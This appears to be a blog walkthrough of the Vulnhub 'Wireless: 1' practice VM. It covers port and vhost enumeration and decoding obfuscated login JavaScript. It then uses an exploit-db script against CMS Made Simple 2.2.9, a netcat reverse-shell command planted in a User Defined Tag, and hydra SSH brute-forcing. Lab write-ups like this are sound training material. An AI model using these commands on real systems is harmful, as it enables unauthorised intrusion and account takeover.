Vulnhub Wireless: 1 Walkthrough

https://www.vulnhub.com/entry/wireless-1,669/


Nmap scan ports.

nmap -sV -p- -oN ports.log 192.168.33.136

图片.png


Scan port 80, only index.html.

Visit port 8000, look like a cms site. Take care the upper-left, there is a username "jinmori@voip.in".

图片.png


Click login, come to log in panel.

图片.png


Check source code, notice login.js.

图片.png


Check the source code of login.js.

图片.png


Base64 decode the code, get original js code.

var _0xb5c3=["\x6A\x69\x6E\x6D\x6F\x72\x69","\x54\x68\x65\x20\x71\x75\x69\x63\x6B\x20\x62\x72\x6F\x77\x6E\x20\x66\x6F\x78\x20\x6A\x75\x6D\x70\x73\x20\x6F\x76\x65\x72\x20\x74\x68\x65\x20\x6C\x61\x7A\x79\x20\x64\x6F\x67","\x63\x68\x61\x72\x43\x6F\x64\x65\x41\x74","\x66\x72\x6F\x6D\x43\x68\x61\x72\x43\x6F\x64\x65"];
var u=_0xb5c3[0];
var string=_0xb5c3[1];
var a=string[_0xb5c3[2]](0);
var b=string[_0xb5c3[2]](36);
var c=string[_0xb5c3[2]](2);
var d=string[_0xb5c3[2]](8);
var e=string[_0xb5c3[2]](13);
var f=string[_0xb5c3[2]](12);
var g=string[_0xb5c3[2]](14);
var h=string[_0xb5c3[2]](40);
var i=string[_0xb5c3[2]](12);
var p=String[_0xb5c3[3]](a,b,c,d,e,f,g,h,i);


Run this piece of code online at https://playcode.io/new/, get a string, looks like a password.

图片.png


Login with "jinmori"  and the password we just got, come to admin panel.

图片.png


Choose admin-->VOIP logs.

图片.png


Get some sms encoded string.

图片.png


Decrypt the string online at https://www.diafaan.com/sms-tutorials/gsm-modem-tutorial/online-sms-pdu-decoder/, get some hints.

ur new domain for WiFi testing is wireless.com 
Wireless Testing portal is open for authenticated users to test our internal network wireless.com
Testing Portal has been shifted to port: 8080


Add wireless.com to /etc/hosts. Scan vhost of port 8080. Found testing.wireless.com, add to /etc/hosts too.

gobuster vhost -u http://wireless.com:8080  -w  /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt

图片.png


Gobuster scan port 80 through wireless.com again, now we can found a cms site. (Before, it is empty.)

gobuster dir -u http://wireless.com -t 50  -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt  -x .html,.php,.txt,.bak,.zip -b 401,403,404,500 --wildcard

图片.png


Now we have two places to check, first is wireless.com:80, second is testing.wireless.com:8080.

Let's first do port 80. It's a Cms Made Simple site.

图片.png



Notice the version is 2.2.9.

图片.png


Search exploitdb.

图片.png


Use the POC code to get username and password.

python 46635.py -u http://wireless.com --crack -w /usr/share/wordlists/rockyou.txt

图片.png


Login with credentials,  at Extentions-->User Defined Tags, Edit User Defined Tag,  input shell code and click "Apply" --> "Run".

echo system("nc 192.168.33.128 2333|/bin/sh|nc 192.168.33.128 2444");

图片.png


After we click run, we can get reverse shell, port 2333 is input, port 2444 to output.

图片.png


Then we can upload a traditinal php reverse shell, and get interactive shell in one terminal.

图片.png



The machine has only one user "coherer", and after a lot enum, www-data can not escalate to user "coherer".

图片.png


Now let's back to port 8080. Visit it, we come to a bot app. Type "help", we can see some commands.

图片.png


Input "logs", then we get a log file http://testing.wireless.com:8080/static/Network.data.

Check the content, there are several short stories in it.

Now we may create a dic form it.

cewl -d 1 http://testing.wireless.com:8080/static/Network.data > dic.txt

图片.png


Brute force the ssh password of coherer with this dic.

hydra -l coherer -P dic.txt -t 64 192.168.33.136 ssh -f

图片.png


Log in ssh, check group.

图片.png


The last step is a classic lxd root privilege escalation.  Just bypass it.

图片.png

发表评论:

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。

«    2022年5月    »
1
2345678
9101112131415
16171819202122
23242526272829
3031
网站分类
搜索
最新留言
文章归档
网站收藏
  • 订阅本站的 RSS 2.0 新闻聚合

Powered By Z-BlogPHP 1.7.2